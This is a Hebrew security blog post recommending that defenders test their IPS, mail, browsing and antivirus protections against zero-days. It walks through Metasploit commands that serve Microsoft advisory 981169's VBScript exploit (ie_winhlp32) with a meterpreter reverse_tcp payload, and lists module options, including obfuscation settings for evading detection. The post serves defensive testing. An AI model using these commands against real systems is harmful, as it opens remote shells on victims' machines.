בדיקת virtual patch's - או כיצד מערכות האבטחה שלנו מתמודדות עם ZERO DAY

virtual patch's או זיהוי וחסימת התקפה לפני שיחרור הטלאי הרשמי ל ZERODAY הם הגנה מעולה בזמן הפגיע ביותר למחשבים , כלומר הזמן בו המתקיפים יכולים להשתמש בפגיעות וזיכויי ההצלחה הם קרוב ל 100%.
אך האם הפרסומים שיוצאים איתם חברות אבטחה המידע נכונים?
ארגונים מעטים מסמלצים התקפות ובודקים את ההגנות לZERODAY ב א מ ת .
אני ממליץ לכל אנשי האבטחה להתקין BACKTRACK ולהשתמש ב METASPLOIT או כלים אחרים לביצוע התקפה אמיתית תוך כדי שימוש בקוד הזמין באינטרנט לבדיקת מערכות האבטחה שלהם.
אין כאן צורך ב PENTEST מעמיק וזאת צריכה להיות עבודה שהיא חלק מהשוטף .חלק נכבד מההתקפות ניתן לסמלץ בשעה עבודה.
אני אישית כבר עליתי על אבטחת שווא כזאת מחברה שלא אזכיר את שמה ובעקבות זה שונתה החתימה .

לדוגמא
ה Z0RO DAY האחרון מבית מיקרוסופט המאפשר הרצת קוד על המותקף ע"י פיתויו ללחוץ f1 דרך הודעה הכתובה ב
VB

Microsoft Security Advisory 981169

Vulnerability in VBScript Could Allow Remote Code Execution

Published: March 01, 2010

במקום לשבת ולחקות ל PATCH -נבדוק האם קוד הEXPLOIT זמין וננסה לבדוק את חסינות מערכות האבטחה שלנו מולו
החל מהגנות בגלישה , IPS,MAIL ועד לרמת ה AV המקומי.

הקוד זמין לבדיקה ב METASPLOIT
לאחר כל ההגדרות והעדכונים נעלה אתר ברשת המבצע את ה EXPLOIT ע"י הרצץ הפקודות הבאות

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/browser/ie_winhlp32
msf exploit(ie_winhlp32) > show payloads
msf exploit(ie_winhlp32) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_winhlp32) > set LHOST [MY IP ADDRESS]
msf exploit(ie_winhlp32) > exploit

אופציות המודול:

SRVHOST The local host to listen on. (default: 0.0.0.0)

SRVPORT The local port to listen on. (default: 8080)

SSL Negotiate SSL for incoming connections

SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)

URIPATH The URI to use for this exploit (default is random)

ContextInformationFile The information file that contains context information

DisablePayloadHandler Disable the handler code for the selected payload

EnableContextEncoding Use transient context when encoding payloads

WORKSPACE Specify the workspace for this module

HTML::base64 Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection)

HTML::javascript::escape Enable HTML obfuscation via HTML escaping (number of iterations)

HTML::unicode Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)

HTTP::chunked Enable chunking of HTTP responses via "Transfer-Encoding: chunked"

HTTP::compression Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)

HTTP::header_folding Enable folding of HTTP headers

HTTP::junk_headers Enable insertion of random junk HTTP headers

TCP::max_send_size Maximum tcp segment size. (0 = disable)

TCP::send_delay Delays inserted before every send. (0 = disable)

בהצלחה

SEC-SEE

Latest Security News

בדיקת virtual patch's - או כיצד מערכות האבטחה שלנו מתמודדות עם ZERO DAY

Microsoft Security Advisory 981169

Vulnerability in VBScript Could Allow Remote Code Execution

Copyright Text

SRVHOST	The local host to listen on. (default: 0.0.0.0)
SRVPORT	The local port to listen on. (default: 8080)
SSL	Negotiate SSL for incoming connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
URIPATH	The URI to use for this exploit (default is random)
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
EnableContextEncoding	Use transient context when encoding payloads
WORKSPACE	Specify the workspace for this module
HTML::base64	Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape	Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode	Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked	Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression	Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
HTTP::header_folding	Enable folding of HTTP headers
HTTP::junk_headers	Enable insertion of random junk HTTP headers
TCP::max_send_size	Maximum tcp segment size. (0 = disable)
TCP::send_delay	Delays inserted before every send. (0 = disable)